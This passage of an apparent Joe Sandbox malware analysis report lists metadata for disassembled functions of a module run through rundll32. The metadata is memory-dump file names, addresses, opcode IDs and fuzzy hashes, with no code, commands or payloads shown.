                                                                                                                                  • Associated: 00000004.00000002.4601850792.00007FFD93000000.00000020.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000004.00000002.4602385661.00007FFD93003000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000004.00000002.4602385661.00007FFD9306A000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000004.00000002.4602385661.00007FFD930A4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000004.00000002.4602615645.00007FFD930A6000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000004.00000002.4602650721.00007FFD930A7000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000004.00000002.4602676417.00007FFD930A8000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000004.00000002.4602717324.00007FFD930A9000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000004.00000002.4602759419.00007FFD930C5000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000004.00000002.4602759419.00007FFD930E0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000004.00000002.4602834250.00007FFD930EC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                  • Snapshot File: hcaresult_4_2_7ffd92db0000_rundll32.jbxd
                                                                                                                                  Similarity
                                                                                                                                  • API ID:
                                                                                                                                  • String ID:
                                                                                                                                  • API String ID:
                                                                                                                                  • Opcode ID: f0870ee9dc219f4e63bafa377729bcfe0590bed96396ebf3c9b9ba3413110b61
                                                                                                                                  • Instruction ID: 3b0f975dcfe1110db4722c92760a8670ec582455ca42a25f6f69801de6b3e04b
                                                                                                                                  • Opcode Fuzzy Hash: f0870ee9dc219f4e63bafa377729bcfe0590bed96396ebf3c9b9ba3413110b61
                                                                                                                                  • Instruction Fuzzy Hash: 0321FEE3B703282BF91B85AA7D16FAD90029B52BF5C5093357D390ABC6F13C59CB8540
                                                                                                                                  Function 00007FFD92DCA6E0 Relevance: .1, Instructions: 142COMMON
                                                                                                                                  Download Yara Rule
                                                                                                                                  Memory Dump Source
                                                                                                                                  • Source File: 00000004.00000002.4601850792.00007FFD92DB1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FFD92DB0000, based on PE: true
                                                                                                                                  • Associated: 00000004.00000002.4601807365.00007FFD92DB0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000004.00000002.4601850792.00007FFD92DF0000.00000020.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000004.00000002.4601850792.00007FFD92E4C000.00000020.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000004.00000002.4601850792.00007FFD92FF5000.00000020.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000004.00000002.4601850792.00007FFD93000000.00000020.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000004.00000002.4602385661.00007FFD93003000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000004.00000002.4602385661.00007FFD9306A000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000004.00000002.4602385661.00007FFD930A4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000004.00000002.4602615645.00007FFD930A6000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000004.00000002.4602650721.00007FFD930A7000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000004.00000002.4602676417.00007FFD930A8000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000004.00000002.4602717324.00007FFD930A9000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000004.00000002.4602759419.00007FFD930C5000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000004.00000002.4602759419.00007FFD930E0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000004.00000002.4602834250.00007FFD930EC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                  • Snapshot File: hcaresult_4_2_7ffd92db0000_rundll32.jbxd
                                                                                                                                  Similarity
                                                                                                                                  • API ID:
                                                                                                                                  • String ID:
                                                                                                                                  • API String ID:
                                                                                                                                  • Opcode ID: 6e6ec60371743c673f2dc5408cd27dc9e30516abff4a615a9cfba148939d17aa
                                                                                                                                  • Instruction ID: 70b31da234a1ead5acdb7da9ee72bb9e8c57eae83374de04a0f6af178171a973
                                                                                                                                  • Opcode Fuzzy Hash: 6e6ec60371743c673f2dc5408cd27dc9e30516abff4a615a9cfba148939d17aa
                                                                                                                                  • Instruction Fuzzy Hash: A5219AE37653582AFD0786A67E26FAE95026B42BF4C1093316D390ABC6E17C68DB8440
                                                                                                                                  Function 00007FFD92DB7F10 Relevance: .1, Instructions: 140COMMON
                                                                                                                                  Download Yara Rule
                                                                                                                                  Memory Dump Source
                                                                                                                                  • Source File: 00000004.00000002.4601850792.00007FFD92DB1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FFD92DB0000, based on PE: true
                                                                                                                                  • Associated: 00000004.00000002.4601807365.00007FFD92DB0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000004.00000002.4601850792.00007FFD92DF0000.00000020.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000004.00000002.4601850792.00007FFD92E4C000.00000020.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000004.00000002.4601850792.00007FFD92FF5000.00000020.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000004.00000002.4601850792.00007FFD93000000.00000020.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000004.00000002.4602385661.00007FFD93003000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000004.00000002.4602385661.00007FFD9306A000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000004.00000002.4602385661.00007FFD930A4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000004.00000002.4602615645.00007FFD930A6000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000004.00000002.4602650721.00007FFD930A7000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000004.00000002.4602676417.00007FFD930A8000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000004.00000002.4602717324.00007FFD930A9000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000004.00000002.4602759419.00007FFD930C5000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000004.00000002.4602759419.00007FFD930E0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000004.00000002.4602834250.00007FFD930EC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                  • Snapshot File: hcaresult_4_2_7ffd92db0000_rundll32.jbxd
                                                                                                                                  Similarity
                                                                                                                                  • API ID:
                                                                                                                                  • String ID:
                                                                                                                                  • API String ID:
                                                                                                                                  • Opcode ID: 8c86a8126ae9f3b296d4a1ecf8d02d7de804dc1120b85fbeb5f9731d4dd88036
                                                                                                                                  • Instruction ID: d14da68af4d4a40f4222d08fe1127787bf4f0490dd31a77abc7d63a4368136dc
                                                                                                                                  • Opcode Fuzzy Hash: 8c86a8126ae9f3b296d4a1ecf8d02d7de804dc1120b85fbeb5f9731d4dd88036
                                                                                                                                  • Instruction Fuzzy Hash: 2A515BB37244E143DB08CF64D89167E7B71F754B86B8AD129DB9A4AB49D63CC311C300
                                                                                                                                  Function 00007FFD92DCA8A0 Relevance: .1, Instructions: 140COMMON
                                                                                                                                  Download Yara Rule
                                                                                                                                  Memory Dump Source
                                                                                                                                  • Source File: 00000004.00000002.4601850792.00007FFD92DB1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FFD92DB0000, based on PE: true
                                                                                                                                  • Associated: 00000004.00000002.4601807365.00007FFD92DB0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000004.00000002.4601850792.00007FFD92DF0000.00000020.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000004.00000002.4601850792.00007FFD92E4C000.00000020.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000004.00000002.4601850792.00007FFD92FF5000.00000020.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000004.00000002.4601850792.00007FFD93000000.00000020.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000004.00000002.4602385661.00007FFD93003000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000004.00000002.4602385661.00007FFD9306A000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000004.00000002.4602385661.00007FFD930A4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000004.00000002.4602615645.00007FFD930A6000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000004.00000002.4602650721.00007FFD930A7000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000004.00000002.4602676417.00007FFD930A8000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000004.00000002.4602717324.00007FFD930A9000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000004.00000002.4602759419.00007FFD930C5000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000004.00000002.4602759419.00007FFD930E0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000004.00000002.4602834250.00007FFD930EC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                  • Snapshot File: hcaresult_4_2_7ffd92db0000_rundll32.jbxd
                                                                                                                                  Similarity
                                                                                                                                  • API ID:
                                                                                                                                  • String ID:
                                                                                                                                  • API String ID:
                                                                                                                                  • Opcode ID: 0831ea5d238e320e043edef5602c1a1635387b5d3534755e058b4b1112a5563b
                                                                                                                                  • Instruction ID: 0b395f82534a2bf6676f8fd32924a702e32e123e443e7d989494badf1025d2b9
                                                                                                                                  • Opcode Fuzzy Hash: 0831ea5d238e320e043edef5602c1a1635387b5d3534755e058b4b1112a5563b
                                                                                                                                  • Instruction Fuzzy Hash: 8B21F3E3B613181AFD1BC6B97D12BAD90029B52BF5C5093316D390A7C6F53C54DB8540
                                                                                                                                  Function 00007FFD92DB76B0 Relevance: .1, Instructions: 139COMMON
                                                                                                                                  Download Yara Rule
                                                                                                                                  Memory Dump Source
                                                                                                                                  • Source File: 00000004.00000002.4601850792.00007FFD92DB1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FFD92DB0000, based on PE: true
                                                                                                                                  • Associated: 00000004.00000002.4601807365.00007FFD92DB0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000004.00000002.4601850792.00007FFD92DF0000.00000020.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000004.00000002.4601850792.00007FFD92E4C000.00000020.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000004.00000002.4601850792.00007FFD92FF5000.00000020.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000004.00000002.4601850792.00007FFD93000000.00000020.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000004.00000002.4602385661.00007FFD93003000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000004.00000002.4602385661.00007FFD9306A000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000004.00000002.4602385661.00007FFD930A4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000004.00000002.4602615645.00007FFD930A6000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000004.00000002.4602650721.00007FFD930A7000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000004.00000002.4602676417.00007FFD930A8000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000004.00000002.4602717324.00007FFD930A9000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000004.00000002.4602759419.00007FFD930C5000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000004.00000002.4602759419.00007FFD930E0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000004.00000002.4602834250.00007FFD930EC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                  • Snapshot File: hcaresult_4_2_7ffd92db0000_rundll32.jbxd
                                                                                                                                  Similarity
                                                                                                                                  • API ID:
                                                                                                                                  • String ID:
                                                                                                                                  • API String ID:
                                                                                                                                  • Opcode ID: 186ff67f92c9eaa1a8eb326ab161dd274dfd146ec44f6bee209abb6b941af7be
                                                                                                                                  • Instruction ID: 02bf9bf2238916cce337187cd64b5711e07a8b1fb789581812c20544497ded1a
                                                                                                                                  • Opcode Fuzzy Hash: 186ff67f92c9eaa1a8eb326ab161dd274dfd146ec44f6bee209abb6b941af7be
                                                                                                                                  • Instruction Fuzzy Hash: 2F417252B196CE04FD75CD9A0F34AB41690AF537A2D6853B4DE9D13BC3C94CA99EC200
                                                                                                                                  Function 00007FFD92DCAA30 Relevance: .1, Instructions: 133COMMONLIBRARYCODE
                                                                                                                                  Download Yara Rule
                                                                                                                                  Memory Dump Source
                                                                                                                                  • Source File: 00000004.00000002.4601850792.00007FFD92DB1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FFD92DB0000, based on PE: true
                                                                                                                                  • Associated: 00000004.00000002.4601807365.00007FFD92DB0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000004.00000002.4601850792.00007FFD92DF0000.00000020.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000004.00000002.4601850792.00007FFD92E4C000.00000020.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000004.00000002.4601850792.00007FFD92FF5000.00000020.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000004.00000002.4601850792.00007FFD93000000.00000020.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000004.00000002.4602385661.00007FFD93003000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000004.00000002.4602385661.00007FFD9306A000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000004.00000002.4602385661.00007FFD930A4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000004.00000002.4602615645.00007FFD930A6000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000004.00000002.4602650721.00007FFD930A7000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000004.00000002.4602676417.00007FFD930A8000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000004.00000002.4602717324.00007FFD930A9000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000004.00000002.4602759419.00007FFD930C5000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000004.00000002.4602759419.00007FFD930E0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000004.00000002.4602834250.00007FFD930EC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                  • Snapshot File: hcaresult_4_2_7ffd92db0000_rundll32.jbxd
                                                                                                                                  Similarity
                                                                                                                                  • API ID:
                                                                                                                                  • String ID:
                                                                                                                                  • API String ID:
                                                                                                                                  • Opcode ID: 1f5c6e5a3c8e3dddba7c86b1ebc8e4d3d77d3a54adbaefcf0c8078a2b3cc7aa6
                                                                                                                                  • Instruction ID: 5261afa0df85f549a2225ab9f291ebe9813766d35b12ba7185207d7a0b5a717b
                                                                                                                                  • Opcode Fuzzy Hash: 1f5c6e5a3c8e3dddba7c86b1ebc8e4d3d77d3a54adbaefcf0c8078a2b3cc7aa6
                                                                                                                                  • Instruction Fuzzy Hash: E221F2E3BB131826EC1BC6A97E16FAC90029B52BF1C5093356D3906BC6F13C64CB8580
                                                                                                                                  Function 00007FFD92DB38E0 Relevance: .1, Instructions: 112COMMON
                                                                                                                                  Download Yara Rule
                                                                                                                                  Memory Dump Source
                                                                                                                                  • Source File: 00000004.00000002.4601850792.00007FFD92DB1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FFD92DB0000, based on PE: true
                                                                                                                                  • Associated: 00000004.00000002.4601807365.00007FFD92DB0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000004.00000002.4601850792.00007FFD92DF0000.00000020.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000004.00000002.4601850792.00007FFD92E4C000.00000020.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000004.00000002.4601850792.00007FFD92FF5000.00000020.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000004.00000002.4601850792.00007FFD93000000.00000020.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000004.00000002.4602385661.00007FFD93003000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000004.00000002.4602385661.00007FFD9306A000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000004.00000002.4602385661.00007FFD930A4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000004.00000002.4602615645.00007FFD930A6000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000004.00000002.4602650721.00007FFD930A7000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000004.00000002.4602676417.00007FFD930A8000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000004.00000002.4602717324.00007FFD930A9000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000004.00000002.4602759419.00007FFD930C5000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000004.00000002.4602759419.00007FFD930E0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000004.00000002.4602834250.00007FFD930EC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                  • Snapshot File: hcaresult_4_2_7ffd92db0000_rundll32.jbxd
                                                                                                                                  Similarity
                                                                                                                                  • API ID:
                                                                                                                                  • String ID:
                                                                                                                                  • API String ID:
                                                                                                                                  • Opcode ID: 4a07b13cf06458385009f86602a0371922a765af3a5e45a29d09d799352fe586
                                                                                                                                  • Instruction ID: 12932e0f0dd0f68fc1f901cc4f22d78a8a48269814b9a4f0555b4e88f0387879
                                                                                                                                  • Opcode Fuzzy Hash: 4a07b13cf06458385009f86602a0371922a765af3a5e45a29d09d799352fe586
                                                                                                                                  • Instruction Fuzzy Hash: C6412572F1C6428AF7748FEAF865B393AA4EB09351F1186B9D94DC76D4DBBCA4404B00
                                                                                                                                  Function 00007FFD92DB18B0 Relevance: .1, Instructions: 92COMMON
                                                                                                                                  Download Yara Rule
                                                                                                                                  Memory Dump Source
                                                                                                                                  • Source File: 00000004.00000002.4601850792.00007FFD92DB1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FFD92DB0000, based on PE: true
                                                                                                                                  • Associated: 00000004.00000002.4601807365.00007FFD92DB0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000004.00000002.4601850792.00007FFD92DF0000.00000020.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000004.00000002.4601850792.00007FFD92E4C000.00000020.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000004.00000002.4601850792.00007FFD92FF5000.00000020.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000004.00000002.4601850792.00007FFD93000000.00000020.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000004.00000002.4602385661.00007FFD93003000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000004.00000002.4602385661.00007FFD9306A000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000004.00000002.4602385661.00007FFD930A4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000004.00000002.4602615645.00007FFD930A6000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000004.00000002.4602650721.00007FFD930A7000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000004.00000002.4602676417.00007FFD930A8000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000004.00000002.4602717324.00007FFD930A9000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000004.00000002.4602759419.00007FFD930C5000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000004.00000002.4602759419.00007FFD930E0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000004.00000002.4602834250.00007FFD930EC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                  • Snapshot File: hcaresult_4_2_7ffd92db0000_rundll32.jbxd
                                                                                                                                  Similarity
                                                                                                                                  • API ID:
                                                                                                                                  • String ID:
                                                                                                                                  • API String ID:
                                                                                                                                  • Opcode ID: f4da23fae1cb98d27985eb746dccb9934761756032c76aceb6fa1dc463613e7b
                                                                                                                                  • Instruction ID: 87555c654b4c84f4c4a35e09a2414bb91de4966bb57985c9d6e8bfc5b35b81e9
                                                                                                                                  • Opcode Fuzzy Hash: f4da23fae1cb98d27985eb746dccb9934761756032c76aceb6fa1dc463613e7b
                                                                                                                                  • Instruction Fuzzy Hash: 7E318D32F1C15386F6B59DEB9535E7D1246AFC2342F249330C50E06EEAEDEEB9429640
                                                                                                                                  Function 00007FFD92DB4F20 Relevance: .1, Instructions: 91COMMON
                                                                                                                                  Download Yara Rule
                                                                                                                                  Memory Dump Source
                                                                                                                                  • Source File: 00000004.00000002.4601850792.00007FFD92DB1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FFD92DB0000, based on PE: true
                                                                                                                                  • Associated: 00000004.00000002.4601807365.00007FFD92DB0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000004.00000002.4601850792.00007FFD92DF0000.00000020.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000004.00000002.4601850792.00007FFD92E4C000.00000020.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000004.00000002.4601850792.00007FFD92FF5000.00000020.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000004.00000002.4601850792.00007FFD93000000.00000020.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000004.00000002.4602385661.00007FFD93003000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000004.00000002.4602385661.00007FFD9306A000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000004.00000002.4602385661.00007FFD930A4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000004.00000002.4602615645.00007FFD930A6000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000004.00000002.4602650721.00007FFD930A7000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000004.00000002.4602676417.00007FFD930A8000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000004.00000002.4602717324.00007FFD930A9000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000004.00000002.4602759419.00007FFD930C5000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000004.00000002.4602759419.00007FFD930E0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000004.00000002.4602834250.00007FFD930EC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                  • Snapshot File: hcaresult_4_2_7ffd92db0000_rundll32.jbxd
                                                                                                                                  Similarity
                                                                                                                                  • API ID:
                                                                                                                                  • String ID:
                                                                                                                                  • API String ID:
                                                                                                                                  • Opcode ID: ea65791f660fafc541e61cc5057073e28f0a6fc8669d54002cd5ef117ae58243
                                                                                                                                  • Instruction ID: da89c62db1b915d69b0ab47dbda3c42d1edd8b5bc1a227c5bac8d81e20c398b1
                                                                                                                                  • Opcode Fuzzy Hash: ea65791f660fafc541e61cc5057073e28f0a6fc8669d54002cd5ef117ae58243
                                                                                                                                  • Instruction Fuzzy Hash: 6631AF32F1C14385F6B59EEB85B4E7E1152AFC2342E649630C10D0AEC9ECEEBC018591
                                                                                                                                  Function 00007FFD92DB7780 Relevance: .1, Instructions: 66COMMON
                                                                                                                                  Download Yara Rule
                                                                                                                                  Memory Dump Source
                                                                                                                                  • Source File: 00000004.00000002.4601850792.00007FFD92DB1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FFD92DB0000, based on PE: true
                                                                                                                                  • Associated: 00000004.00000002.4601807365.00007FFD92DB0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000004.00000002.4601850792.00007FFD92DF0000.00000020.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000004.00000002.4601850792.00007FFD92E4C000.00000020.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000004.00000002.4601850792.00007FFD92FF5000.00000020.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000004.00000002.4601850792.00007FFD93000000.00000020.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000004.00000002.4602385661.00007FFD93003000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000004.00000002.4602385661.00007FFD9306A000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000004.00000002.4602385661.00007FFD930A4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000004.00000002.4602615645.00007FFD930A6000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000004.00000002.4602650721.00007FFD930A7000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000004.00000002.4602676417.00007FFD930A8000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000004.00000002.4602717324.00007FFD930A9000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000004.00000002.4602759419.00007FFD930C5000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000004.00000002.4602759419.00007FFD930E0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000004.00000002.4602834250.00007FFD930EC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                  • Snapshot File: hcaresult_4_2_7ffd92db0000_rundll32.jbxd
                                                                                                                                  Similarity
                                                                                                                                  • API ID:
                                                                                                                                  • String ID:
                                                                                                                                  • API String ID:
                                                                                                                                  • Opcode ID: 2cc839d04e98489f5785c243189da5071302b04d50697954c13b85449f380218
                                                                                                                                  • Instruction ID: 1aa970d268c5a9506acf7b884e6f5551e57b0fe159021f06649498a702d1e2e8
                                                                                                                                  • Opcode Fuzzy Hash: 2cc839d04e98489f5785c243189da5071302b04d50697954c13b85449f380218
                                                                                                                                  • Instruction Fuzzy Hash: 2E21E2177385B004FBB58729B071F367AE4DBA97C0F81B032A9AC86E95E91FD1008F50
                                                                                                                                  Function 00007FFD92DBD4C0 Relevance: .1, Instructions: 66COMMON
                                                                                                                                  Download Yara Rule
                                                                                                                                  Memory Dump Source
                                                                                                                                  • Source File: 00000004.00000002.4601850792.00007FFD92DB1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FFD92DB0000, based on PE: true
                                                                                                                                  • Associated: 00000004.00000002.4601807365.00007FFD92DB0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000004.00000002.4601850792.00007FFD92DF0000.00000020.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000004.00000002.4601850792.00007FFD92E4C000.00000020.00000001.01000000.00000003.sdmpDownload File
